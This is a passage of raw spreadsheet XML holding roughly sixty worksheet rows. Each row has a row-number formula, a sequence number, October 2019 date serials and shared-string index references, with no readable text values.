      <c r="B13808">
        <v>3807</v>
      </c>
      <c r="C13808" t="s">
        <v>19637</v>
      </c>
      <c r="D13808" s="1">
        <v>43743</v>
      </c>
      <c r="F13808" t="s">
        <v>10526</v>
      </c>
      <c r="G13808" t="s">
        <v>24182</v>
      </c>
    </row>
    <row r="13809" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13809">
        <f t="shared" si="215"/>
        <v>13808</v>
      </c>
      <c r="B13809">
        <v>3808</v>
      </c>
      <c r="C13809" t="s">
        <v>19637</v>
      </c>
      <c r="D13809" s="1">
        <v>43756</v>
      </c>
      <c r="E13809" t="s">
        <v>19750</v>
      </c>
      <c r="F13809" t="s">
        <v>9978</v>
      </c>
      <c r="G13809" t="s">
        <v>24183</v>
      </c>
    </row>
    <row r="13810" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13810">
        <f t="shared" si="215"/>
        <v>13809</v>
      </c>
      <c r="B13810">
        <v>3809</v>
      </c>
      <c r="C13810" t="s">
        <v>19637</v>
      </c>
      <c r="D13810" s="1">
        <v>43753</v>
      </c>
      <c r="E13810" t="s">
        <v>22687</v>
      </c>
      <c r="F13810" t="s">
        <v>10526</v>
      </c>
      <c r="G13810" t="s">
        <v>24184</v>
      </c>
    </row>
    <row r="13811" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13811">
        <f t="shared" si="215"/>
        <v>13810</v>
      </c>
      <c r="B13811">
        <v>3810</v>
      </c>
      <c r="C13811" t="s">
        <v>19637</v>
      </c>
      <c r="D13811" s="1">
        <v>43749</v>
      </c>
      <c r="E13811" t="s">
        <v>24185</v>
      </c>
      <c r="F13811" t="s">
        <v>10526</v>
      </c>
      <c r="G13811" t="s">
        <v>24186</v>
      </c>
    </row>
    <row r="13812" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13812">
        <f t="shared" si="215"/>
        <v>13811</v>
      </c>
      <c r="B13812">
        <v>3811</v>
      </c>
      <c r="C13812" t="s">
        <v>19637</v>
      </c>
      <c r="D13812" s="1">
        <v>43746</v>
      </c>
      <c r="E13812" t="s">
        <v>19663</v>
      </c>
      <c r="F13812" t="s">
        <v>9975</v>
      </c>
      <c r="G13812" t="s">
        <v>24187</v>
      </c>
    </row>
    <row r="13813" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13813">
        <f t="shared" si="215"/>
        <v>13812</v>
      </c>
      <c r="B13813">
        <v>3812</v>
      </c>
      <c r="C13813" t="s">
        <v>19637</v>
      </c>
      <c r="D13813" s="1">
        <v>43748</v>
      </c>
      <c r="E13813" t="s">
        <v>19640</v>
      </c>
      <c r="F13813" t="s">
        <v>10021</v>
      </c>
      <c r="G13813" t="s">
        <v>24188</v>
      </c>
    </row>
    <row r="13814" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13814">
        <f t="shared" si="215"/>
        <v>13813</v>
      </c>
      <c r="B13814">
        <v>3813</v>
      </c>
      <c r="C13814" t="s">
        <v>19637</v>
      </c>
      <c r="D13814" s="1">
        <v>43757</v>
      </c>
      <c r="F13814" t="s">
        <v>10526</v>
      </c>
      <c r="G13814" t="s">
        <v>24189</v>
      </c>
    </row>
    <row r="13815" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13815">
        <f t="shared" si="215"/>
        <v>13814</v>
      </c>
      <c r="B13815">
        <v>3814</v>
      </c>
      <c r="C13815" t="s">
        <v>19637</v>
      </c>
      <c r="D13815" s="1">
        <v>43751</v>
      </c>
      <c r="E13815" t="s">
        <v>19849</v>
      </c>
      <c r="F13815" t="s">
        <v>10021</v>
      </c>
      <c r="G13815" t="s">
        <v>24190</v>
      </c>
    </row>
    <row r="13816" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13816">
        <f t="shared" si="215"/>
        <v>13815</v>
      </c>
      <c r="B13816">
        <v>3815</v>
      </c>
      <c r="C13816" t="s">
        <v>19637</v>
      </c>
      <c r="D13816" s="1">
        <v>43754</v>
      </c>
      <c r="E13816" t="s">
        <v>22222</v>
      </c>
      <c r="F13816" t="s">
        <v>9978</v>
      </c>
      <c r="G13816" t="s">
        <v>24191</v>
      </c>
    </row>
    <row r="13817" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13817">
        <f t="shared" si="215"/>
        <v>13816</v>
      </c>
      <c r="B13817">
        <v>3816</v>
      </c>
      <c r="C13817" t="s">
        <v>19637</v>
      </c>
      <c r="D13817" s="1">
        <v>43739</v>
      </c>
      <c r="E13817" t="s">
        <v>19750</v>
      </c>
      <c r="F13817" t="s">
        <v>9978</v>
      </c>
      <c r="G13817" t="s">
        <v>24192</v>
      </c>
    </row>
    <row r="13818" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13818">
        <f t="shared" si="215"/>
        <v>13817</v>
      </c>
      <c r="B13818">
        <v>3817</v>
      </c>
      <c r="C13818" t="s">
        <v>19637</v>
      </c>
      <c r="D13818" s="1">
        <v>43743</v>
      </c>
      <c r="F13818" t="s">
        <v>10526</v>
      </c>
      <c r="G13818" t="s">
        <v>24193</v>
      </c>
    </row>
    <row r="13819" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13819">
        <f t="shared" si="215"/>
        <v>13818</v>
      </c>
      <c r="B13819">
        <v>3818</v>
      </c>
      <c r="C13819" t="s">
        <v>19637</v>
      </c>
      <c r="D13819" s="1">
        <v>43740</v>
      </c>
      <c r="E13819" t="s">
        <v>20458</v>
      </c>
      <c r="F13819" t="s">
        <v>9978</v>
      </c>
      <c r="G13819" t="s">
        <v>24194</v>
      </c>
    </row>
    <row r="13820" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13820">
        <f t="shared" si="215"/>
        <v>13819</v>
      </c>
      <c r="B13820">
        <v>3819</v>
      </c>
      <c r="C13820" t="s">
        <v>19637</v>
      </c>
      <c r="D13820" s="1">
        <v>43743</v>
      </c>
      <c r="E13820" t="s">
        <v>24195</v>
      </c>
      <c r="F13820" t="s">
        <v>10526</v>
      </c>
      <c r="G13820" t="s">
        <v>24196</v>
      </c>
    </row>
    <row r="13821" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13821">
        <f t="shared" si="215"/>
        <v>13820</v>
      </c>
      <c r="B13821">
        <v>3820</v>
      </c>
      <c r="C13821" t="s">
        <v>19637</v>
      </c>
      <c r="D13821" s="1">
        <v>43747</v>
      </c>
      <c r="E13821" t="s">
        <v>24197</v>
      </c>
      <c r="F13821" t="s">
        <v>10526</v>
      </c>
      <c r="G13821" t="s">
        <v>24198</v>
      </c>
    </row>
    <row r="13822" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13822">
        <f t="shared" si="215"/>
        <v>13821</v>
      </c>
      <c r="B13822">
        <v>3821</v>
      </c>
      <c r="C13822" t="s">
        <v>19637</v>
      </c>
      <c r="D13822" s="1">
        <v>43756</v>
      </c>
      <c r="F13822" t="s">
        <v>10526</v>
      </c>
      <c r="G13822" t="s">
        <v>24199</v>
      </c>
    </row>
    <row r="13823" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13823">
        <f t="shared" si="215"/>
        <v>13822</v>
      </c>
      <c r="B13823">
        <v>3822</v>
      </c>
      <c r="C13823" t="s">
        <v>19637</v>
      </c>
      <c r="D13823" s="1">
        <v>43741</v>
      </c>
      <c r="E13823" t="s">
        <v>20160</v>
      </c>
      <c r="F13823" t="s">
        <v>10526</v>
      </c>
      <c r="G13823" t="s">
        <v>24200</v>
      </c>
    </row>
    <row r="13824" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13824">
        <f t="shared" si="215"/>
        <v>13823</v>
      </c>
      <c r="B13824">
        <v>3823</v>
      </c>
      <c r="C13824" t="s">
        <v>19637</v>
      </c>
      <c r="D13824" s="1">
        <v>43752</v>
      </c>
      <c r="E13824" t="s">
        <v>19750</v>
      </c>
      <c r="F13824" t="s">
        <v>9978</v>
      </c>
      <c r="G13824" t="s">
        <v>24201</v>
      </c>
    </row>
    <row r="13825" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13825">
        <f t="shared" si="215"/>
        <v>13824</v>
      </c>
      <c r="B13825">
        <v>3824</v>
      </c>
      <c r="C13825" t="s">
        <v>19637</v>
      </c>
      <c r="D13825" s="1">
        <v>43740</v>
      </c>
      <c r="E13825" t="s">
        <v>22413</v>
      </c>
      <c r="F13825" t="s">
        <v>10526</v>
      </c>
      <c r="G13825" t="s">
        <v>24202</v>
      </c>
    </row>
    <row r="13826" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13826">
        <f t="shared" si="215"/>
        <v>13825</v>
      </c>
      <c r="B13826">
        <v>3825</v>
      </c>
      <c r="C13826" t="s">
        <v>19637</v>
      </c>
      <c r="D13826" s="1">
        <v>43744</v>
      </c>
      <c r="E13826" t="s">
        <v>19896</v>
      </c>
      <c r="F13826" t="s">
        <v>10021</v>
      </c>
      <c r="G13826" t="s">
        <v>24203</v>
      </c>
    </row>
    <row r="13827" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13827">
        <f t="shared" ref="A13827:A13890" si="216">+ROW(A13826)</f>
        <v>13826</v>
      </c>
      <c r="B13827">
        <v>3826</v>
      </c>
      <c r="C13827" t="s">
        <v>19637</v>
      </c>
      <c r="D13827" s="1">
        <v>43749</v>
      </c>
      <c r="E13827" t="s">
        <v>19640</v>
      </c>
      <c r="F13827" t="s">
        <v>9975</v>
      </c>
      <c r="G13827" t="s">
        <v>24204</v>
      </c>
    </row>
    <row r="13828" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13828">
        <f t="shared" si="216"/>
        <v>13827</v>
      </c>
      <c r="B13828">
        <v>3827</v>
      </c>
      <c r="C13828" t="s">
        <v>19637</v>
      </c>
      <c r="D13828" s="1">
        <v>43752</v>
      </c>
      <c r="E13828" t="s">
        <v>19640</v>
      </c>
      <c r="F13828" t="s">
        <v>9975</v>
      </c>
      <c r="G13828" t="s">
        <v>24205</v>
      </c>
    </row>
    <row r="13829" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13829">
        <f t="shared" si="216"/>
        <v>13828</v>
      </c>
      <c r="B13829">
        <v>3828</v>
      </c>
      <c r="C13829" t="s">
        <v>19637</v>
      </c>
      <c r="D13829" s="1">
        <v>43756</v>
      </c>
      <c r="E13829" t="s">
        <v>24206</v>
      </c>
      <c r="F13829" t="s">
        <v>10526</v>
      </c>
      <c r="G13829" t="s">
        <v>24207</v>
      </c>
    </row>
    <row r="13830" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13830">
        <f t="shared" si="216"/>
        <v>13829</v>
      </c>
      <c r="B13830">
        <v>3829</v>
      </c>
      <c r="C13830" t="s">
        <v>19637</v>
      </c>
      <c r="D13830" s="1">
        <v>43755</v>
      </c>
      <c r="E13830" t="s">
        <v>19705</v>
      </c>
      <c r="F13830" t="s">
        <v>10021</v>
      </c>
      <c r="G13830" t="s">
        <v>24208</v>
      </c>
    </row>
    <row r="13831" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13831">
        <f t="shared" si="216"/>
        <v>13830</v>
      </c>
      <c r="B13831">
        <v>3830</v>
      </c>
      <c r="C13831" t="s">
        <v>19637</v>
      </c>
      <c r="D13831" s="1">
        <v>43746</v>
      </c>
      <c r="E13831" t="s">
        <v>19785</v>
      </c>
      <c r="F13831" t="s">
        <v>9975</v>
      </c>
      <c r="G13831" t="s">
        <v>24209</v>
      </c>
    </row>
    <row r="13832" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13832">
        <f t="shared" si="216"/>
        <v>13831</v>
      </c>
      <c r="B13832">
        <v>3831</v>
      </c>
      <c r="C13832" t="s">
        <v>19637</v>
      </c>
      <c r="D13832" s="1">
        <v>43746</v>
      </c>
      <c r="E13832" t="s">
        <v>24210</v>
      </c>
      <c r="F13832" t="s">
        <v>9978</v>
      </c>
      <c r="G13832" t="s">
        <v>24211</v>
      </c>
    </row>
    <row r="13833" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13833">
        <f t="shared" si="216"/>
        <v>13832</v>
      </c>
      <c r="B13833">
        <v>3832</v>
      </c>
      <c r="C13833" t="s">
        <v>19637</v>
      </c>
      <c r="D13833" s="1">
        <v>43741</v>
      </c>
      <c r="E13833" t="s">
        <v>19663</v>
      </c>
      <c r="F13833" t="s">
        <v>9975</v>
      </c>
      <c r="G13833" t="s">
        <v>24212</v>
      </c>
    </row>
    <row r="13834" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13834">
        <f t="shared" si="216"/>
        <v>13833</v>
      </c>
      <c r="B13834">
        <v>3833</v>
      </c>
      <c r="C13834" t="s">
        <v>19637</v>
      </c>
      <c r="D13834" s="1">
        <v>43738</v>
      </c>
      <c r="F13834" t="s">
        <v>10526</v>
      </c>
      <c r="G13834" t="s">
        <v>24213</v>
      </c>
    </row>
    <row r="13835" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13835">
        <f t="shared" si="216"/>
        <v>13834</v>
      </c>
      <c r="B13835">
        <v>3834</v>
      </c>
      <c r="C13835" t="s">
        <v>19637</v>
      </c>
      <c r="D13835" s="1">
        <v>43741</v>
      </c>
      <c r="F13835" t="s">
        <v>10526</v>
      </c>
      <c r="G13835" t="s">
        <v>24214</v>
      </c>
    </row>
    <row r="13836" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13836">
        <f t="shared" si="216"/>
        <v>13835</v>
      </c>
      <c r="B13836">
        <v>3835</v>
      </c>
      <c r="C13836" t="s">
        <v>19637</v>
      </c>
      <c r="D13836" s="1">
        <v>43748</v>
      </c>
      <c r="E13836" t="s">
        <v>19663</v>
      </c>
      <c r="F13836" t="s">
        <v>9975</v>
      </c>
      <c r="G13836" t="s">
        <v>24215</v>
      </c>
    </row>
    <row r="13837" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13837">
        <f t="shared" si="216"/>
        <v>13836</v>
      </c>
      <c r="B13837">
        <v>3836</v>
      </c>
      <c r="C13837" t="s">
        <v>19637</v>
      </c>
      <c r="D13837" s="1">
        <v>43750</v>
      </c>
      <c r="F13837" t="s">
        <v>10526</v>
      </c>
      <c r="G13837" t="s">
        <v>24216</v>
      </c>
    </row>
    <row r="13838" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13838">
        <f t="shared" si="216"/>
        <v>13837</v>
      </c>
      <c r="B13838">
        <v>3837</v>
      </c>
      <c r="C13838" t="s">
        <v>19637</v>
      </c>
      <c r="D13838" s="1">
        <v>43740</v>
      </c>
      <c r="E13838" t="s">
        <v>20985</v>
      </c>
      <c r="F13838" t="s">
        <v>10526</v>
      </c>
      <c r="G13838" t="s">
        <v>24217</v>
      </c>
    </row>
    <row r="13839" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13839">
        <f t="shared" si="216"/>
        <v>13838</v>
      </c>
      <c r="B13839">
        <v>3838</v>
      </c>
      <c r="C13839" t="s">
        <v>19637</v>
      </c>
      <c r="D13839" s="1">
        <v>43751</v>
      </c>
      <c r="F13839" t="s">
        <v>10526</v>
      </c>
      <c r="G13839" t="s">
        <v>24218</v>
      </c>
    </row>
    <row r="13840" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13840">
        <f t="shared" si="216"/>
        <v>13839</v>
      </c>
      <c r="B13840">
        <v>3839</v>
      </c>
      <c r="C13840" t="s">
        <v>19637</v>
      </c>
      <c r="D13840" s="1">
        <v>43755</v>
      </c>
      <c r="E13840" t="s">
        <v>20995</v>
      </c>
      <c r="F13840" t="s">
        <v>9975</v>
      </c>
      <c r="G13840" t="s">
        <v>24219</v>
      </c>
    </row>
    <row r="13841" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13841">
        <f t="shared" si="216"/>
        <v>13840</v>
      </c>
      <c r="B13841">
        <v>3840</v>
      </c>
      <c r="C13841" t="s">
        <v>19637</v>
      </c>
      <c r="D13841" s="1">
        <v>43752</v>
      </c>
      <c r="F13841" t="s">
        <v>10526</v>
      </c>
      <c r="G13841" t="s">
        <v>24220</v>
      </c>
    </row>
    <row r="13842" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13842">
        <f t="shared" si="216"/>
        <v>13841</v>
      </c>
      <c r="B13842">
        <v>3841</v>
      </c>
      <c r="C13842" t="s">
        <v>19637</v>
      </c>
      <c r="D13842" s="1">
        <v>43747</v>
      </c>
      <c r="E13842" t="s">
        <v>19663</v>
      </c>
      <c r="F13842" t="s">
        <v>9975</v>
      </c>
      <c r="G13842" t="s">
        <v>24221</v>
      </c>
    </row>
    <row r="13843" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13843">
        <f t="shared" si="216"/>
        <v>13842</v>
      </c>
      <c r="B13843">
        <v>3842</v>
      </c>
      <c r="C13843" t="s">
        <v>19637</v>
      </c>
      <c r="D13843" s="1">
        <v>43745</v>
      </c>
      <c r="E13843" t="s">
        <v>19680</v>
      </c>
      <c r="F13843" t="s">
        <v>10021</v>
      </c>
      <c r="G13843" t="s">
        <v>24222</v>
      </c>
    </row>
    <row r="13844" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13844">
        <f t="shared" si="216"/>
        <v>13843</v>
      </c>
      <c r="B13844">
        <v>3843</v>
      </c>
      <c r="C13844" t="s">
        <v>19637</v>
      </c>
      <c r="D13844" s="1">
        <v>43745</v>
      </c>
      <c r="F13844" t="s">
        <v>10526</v>
      </c>
      <c r="G13844" t="s">
        <v>24223</v>
      </c>
    </row>
    <row r="13845" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13845">
        <f t="shared" si="216"/>
        <v>13844</v>
      </c>
      <c r="B13845">
        <v>3844</v>
      </c>
      <c r="C13845" t="s">
        <v>19637</v>
      </c>
      <c r="D13845" s="1">
        <v>43748</v>
      </c>
      <c r="F13845" t="s">
        <v>10021</v>
      </c>
      <c r="G13845" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="13846" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13846">
        <f t="shared" si="216"/>
        <v>13845</v>
      </c>
      <c r="B13846">
        <v>3845</v>
      </c>
      <c r="C13846" t="s">
        <v>19637</v>
      </c>
      <c r="D13846" s="1">
        <v>43754</v>
      </c>
      <c r="E13846" t="s">
        <v>21778</v>
      </c>
      <c r="F13846" t="s">
        <v>10526</v>
      </c>
      <c r="G13846" t="s">
        <v>24224</v>
      </c>
    </row>
    <row r="13847" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13847">
        <f t="shared" si="216"/>
        <v>13846</v>
      </c>
      <c r="B13847">
        <v>3846</v>
      </c>
      <c r="C13847" t="s">
        <v>19637</v>
      </c>
      <c r="D13847" s="1">
        <v>43755</v>
      </c>
      <c r="E13847" t="s">
        <v>19640</v>
      </c>
      <c r="F13847" t="s">
        <v>9975</v>
      </c>
      <c r="G13847" t="s">
        <v>24225</v>
      </c>
    </row>
    <row r="13848" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13848">
        <f t="shared" si="216"/>
        <v>13847</v>
      </c>
      <c r="B13848">
        <v>3847</v>
      </c>
      <c r="C13848" t="s">
        <v>19637</v>
      </c>
      <c r="D13848" s="1">
        <v>43742</v>
      </c>
      <c r="E13848" t="s">
        <v>20218</v>
      </c>
      <c r="F13848" t="s">
        <v>10526</v>
      </c>
      <c r="G13848" t="s">
        <v>24226</v>
      </c>
    </row>
    <row r="13849" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13849">
        <f t="shared" si="216"/>
        <v>13848</v>
      </c>
      <c r="B13849">
        <v>3848</v>
      </c>
      <c r="C13849" t="s">
        <v>19637</v>
      </c>
      <c r="D13849" s="1">
        <v>43748</v>
      </c>
      <c r="F13849" t="s">
        <v>10526</v>
      </c>
      <c r="G13849" t="s">
        <v>24227</v>
      </c>
    </row>
    <row r="13850" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13850">
        <f t="shared" si="216"/>
        <v>13849</v>
      </c>
      <c r="B13850">
        <v>3849</v>
      </c>
      <c r="C13850" t="s">
        <v>19637</v>
      </c>
      <c r="D13850" s="1">
        <v>43756</v>
      </c>
      <c r="F13850" t="s">
        <v>10526</v>
      </c>
      <c r="G13850" t="s">
        <v>24228</v>
      </c>
    </row>
    <row r="13851" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13851">
        <f t="shared" si="216"/>
        <v>13850</v>
      </c>
      <c r="B13851">
        <v>3850</v>
      </c>
      <c r="C13851" t="s">
        <v>19637</v>
      </c>
      <c r="D13851" s="1">
        <v>43745</v>
      </c>
      <c r="E13851" t="s">
        <v>20751</v>
      </c>
      <c r="F13851" t="s">
        <v>10021</v>
      </c>
      <c r="G13851" t="s">
        <v>24229</v>
      </c>
    </row>
    <row r="13852" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13852">
        <f t="shared" si="216"/>
        <v>13851</v>
      </c>
      <c r="B13852">
        <v>3851</v>
      </c>
      <c r="C13852" t="s">
        <v>19637</v>
      </c>
      <c r="D13852" s="1">
        <v>43751</v>
      </c>
      <c r="E13852" t="s">
        <v>20577</v>
      </c>
      <c r="F13852" t="s">
        <v>10021</v>
      </c>
      <c r="G13852" t="s">
        <v>24230</v>
      </c>
    </row>
    <row r="13853" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13853">
        <f t="shared" si="216"/>
        <v>13852</v>
      </c>
      <c r="B13853">
        <v>3852</v>
      </c>
      <c r="C13853" t="s">
        <v>19637</v>
      </c>
      <c r="D13853" s="1">
        <v>43751</v>
      </c>
      <c r="E13853" t="s">
        <v>20253</v>
      </c>
      <c r="F13853" t="s">
        <v>9978</v>
      </c>
      <c r="G13853" t="s">
        <v>24231</v>
      </c>
    </row>
    <row r="13854" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13854">
        <f t="shared" si="216"/>
        <v>13853</v>
      </c>
      <c r="B13854">
        <v>3853</v>
      </c>
      <c r="C13854" t="s">
        <v>19637</v>
      </c>
      <c r="D13854" s="1">
        <v>43746</v>
      </c>
      <c r="E13854" t="s">
        <v>19640</v>
      </c>
      <c r="F13854" t="s">
        <v>9975</v>
      </c>
      <c r="G13854" t="s">
        <v>24232</v>
      </c>
    </row>
    <row r="13855" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13855">
        <f t="shared" si="216"/>
        <v>13854</v>
      </c>
      <c r="B13855">
        <v>3854</v>
      </c>
      <c r="C13855" t="s">
        <v>19637</v>
      </c>
      <c r="D13855" s="1">
        <v>43757</v>
      </c>
      <c r="E13855" t="s">
        <v>19640</v>
      </c>
      <c r="F13855" t="s">
        <v>9975</v>
      </c>
      <c r="G13855" t="s">
        <v>24233</v>
      </c>
    </row>
    <row r="13856" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13856">
        <f t="shared" si="216"/>
        <v>13855</v>
      </c>
      <c r="B13856">
        <v>3855</v>
      </c>
      <c r="C13856" t="s">
        <v>19637</v>
      </c>
      <c r="D13856" s="1">
        <v>43754</v>
      </c>
      <c r="E13856" t="s">
        <v>23576</v>
      </c>
      <c r="F13856" t="s">
        <v>9975</v>
      </c>
      <c r="G13856" t="s">
        <v>24234</v>
      </c>
    </row>
    <row r="13857" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13857">
        <f t="shared" si="216"/>
        <v>13856</v>
      </c>
      <c r="B13857">
        <v>3856</v>
      </c>
      <c r="C13857" t="s">
        <v>19637</v>
      </c>
      <c r="D13857" s="1">
        <v>43751</v>
      </c>
      <c r="E13857" t="s">
        <v>24235</v>
      </c>
      <c r="F13857" t="s">
        <v>10021</v>
      </c>
      <c r="G13857" t="s">
        <v>24236</v>
      </c>
    </row>
    <row r="13858" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13858">
        <f t="shared" si="216"/>
        <v>13857</v>
      </c>
      <c r="B13858">
        <v>3857</v>
      </c>
      <c r="C13858" t="s">
        <v>19637</v>
      </c>
      <c r="D13858" s="1">
        <v>43754</v>
      </c>
      <c r="E13858" t="s">
        <v>22539</v>
      </c>
      <c r="F13858" t="s">
        <v>10021</v>
      </c>
      <c r="G13858" t="s">
        <v>24237</v>
      </c>
    </row>
    <row r="13859" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13859">
        <f t="shared" si="216"/>
        <v>13858</v>
      </c>
      <c r="B13859">
        <v>3858</v>
      </c>
      <c r="C13859" t="s">
        <v>19637</v>
      </c>
      <c r="D13859" s="1">
        <v>43752</v>
      </c>
      <c r="E13859" t="s">
        <v>19640</v>
      </c>
      <c r="F13859" t="s">
        <v>10021</v>
      </c>
      <c r="G13859" t="s">
        <v>24238</v>
      </c>
    </row>
    <row r="13860" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13860">
        <f t="shared" si="216"/>
        <v>13859</v>
      </c>
      <c r="B13860">
        <v>3859</v>
      </c>
      <c r="C13860" t="s">
        <v>19637</v>
      </c>
      <c r="D13860" s="1">
        <v>43742</v>
      </c>
      <c r="E13860" t="s">
        <v>19645</v>
      </c>
      <c r="F13860" t="s">
        <v>9975</v>
      </c>
      <c r="G13860" t="s">
        <v>24239</v>
      </c>
    </row>
    <row r="13861" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13861">
        <f t="shared" si="216"/>
        <v>13860</v>
      </c>
      <c r="B13861">
        <v>3860</v>
      </c>
      <c r="C13861" t="s">
        <v>19637</v>
      </c>
      <c r="D13861" s="1">
        <v>43744</v>
      </c>
      <c r="E13861" t="s">
        <v>20185</v>
      </c>
      <c r="F13861" t="s">
        <v>9975</v>
      </c>
      <c r="G13861" t="s">
        <v>24240</v>
      </c>
    </row>
    <row r="13862" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13862">
        <f t="shared" si="216"/>
        <v>13861</v>
      </c>
      <c r="B13862">
        <v>3861</v>
      </c>
      <c r="C13862" t="s">
        <v>19637</v>
      </c>
      <c r="D13862" s="1">
        <v>43753</v>
      </c>
      <c r="F13862" t="s">
        <v>10526</v>
      </c>
      <c r="G13862" t="s">
        <v>19752</v>
      </c>
    </row>
    <row r="13863" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13863">
        <f t="shared" si="216"/>
        <v>13862</v>
      </c>
      <c r="B13863">
        <v>3862</v>
      </c>
      <c r="C13863" t="s">
        <v>19637</v>
      </c>
      <c r="D13863" s="1">
        <v>43747</v>
      </c>
      <c r="E13863" t="s">
        <v>20801</v>
      </c>
      <c r="F13863" t="s">
        <v>9978</v>
      </c>
      <c r="G13863" t="s">
        <v>24241</v>
      </c>
    </row>
    <row r="13864" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13864">
        <f t="shared" si="216"/>
        <v>13863</v>
      </c>
      <c r="B13864">
        <v>3863</v>
      </c>
      <c r="C13864" t="s">
        <v>19637</v>
      </c>
      <c r="D13864" s="1">
        <v>43757</v>
      </c>
      <c r="F13864" t="s">
        <v>10526</v>
      </c>
      <c r="G13864" t="s">
        <v>24242</v>
      </c>
    </row>
    <row r="13865" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13865">
        <f t="shared" si="216"/>
        <v>13864</v>
      </c>
      <c r="B13865">
        <v>3864</v>
      </c>
      <c r="C13865" t="s">
        <v>19637</v>
      </c>
      <c r="D13865" s="1">
        <v>43743</v>
      </c>
      <c r="E13865" t="s">
        <v>24243</v>
      </c>
      <c r="F13865" t="s">
        <v>10526</v>
      </c>
      <c r="G13865" t="s">
        <v>24244</v>
      </c>
    </row>
    <row r="13866" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13866">
        <f t="shared" si="216"/>
        <v>13865</v>
      </c>
      <c r="B13866">
        <v>3865</v>
      </c>
      <c r="C13866" t="s">
        <v>19637</v>
      </c>
      <c r="D13866" s="1">
        <v>43750</v>
      </c>
      <c r="E13866" t="s">
        <v>19640</v>
      </c>
      <c r="F13866" t="s">
        <v>10021</v>
      </c>
      <c r="G13866" t="s">
        <v>24245</v>
      </c>
    </row>
    <row r="13867" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13867">
        <f t="shared" si="216"/>
        <v>13866</v>
      </c>
      <c r="B13867">
        <v>3866</v>
      </c>
      <c r="C13867" t="s">
        <v>19637</v>
      </c>
      <c r="D13867" s="1">
        <v>43739</v>
      </c>
      <c r="E13867" t="s">
        <v>19650</v>
      </c>
      <c r="F13867" t="s">
        <v>10021</v>
      </c>
      <c r="G13867" t="s">
        <v>24246</v>
      </c>
    </row>
    <row r="13868" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13868">
        <f t="shared" si="216"/>
        <v>13867</v>
      </c>
      <c r="B13868">
        <v>3867</v>
      </c>
      <c r="C13868" t="s">
        <v>19637</v>
      </c>
      <c r="D13868" s="1">
        <v>43755</v>
      </c>
      <c r="E13868" t="s">
        <v>19705</v>
      </c>
      <c r="F13868" t="s">
        <v>10021</v>
      </c>
      <c r="G13868" t="s">
        <v>24247</v>
      </c>
    </row>
    <row r="13869" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13869">
        <f t="shared" si="216"/>
        <v>13868</v>
      </c>
      <c r="B13869">
        <v>3868</v>
      </c>
      <c r="C13869" t="s">
        <v>19637</v>
      </c>
      <c r="D13869" s="1">
        <v>43746</v>
      </c>
      <c r="E13869" t="s">
        <v>19840</v>
      </c>
      <c r="F13869" t="s">
        <v>10021</v>
      </c>
      <c r="G13869" t="s">
        <v>24248</v>
      </c>
    </row>
    <row r="13870" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13870">
        <f t="shared" si="216"/>
        <v>13869</v>
      </c>
      <c r="B13870">
        <v>3869</v>
      </c>
      <c r="C13870" t="s">
        <v>19637</v>
      </c>
      <c r="D13870" s="1">
        <v>43740</v>
      </c>
      <c r="E13870" t="s">
        <v>24249</v>
      </c>
      <c r="F13870" t="s">
        <v>10021</v>
      </c>
      <c r="G13870" t="s">
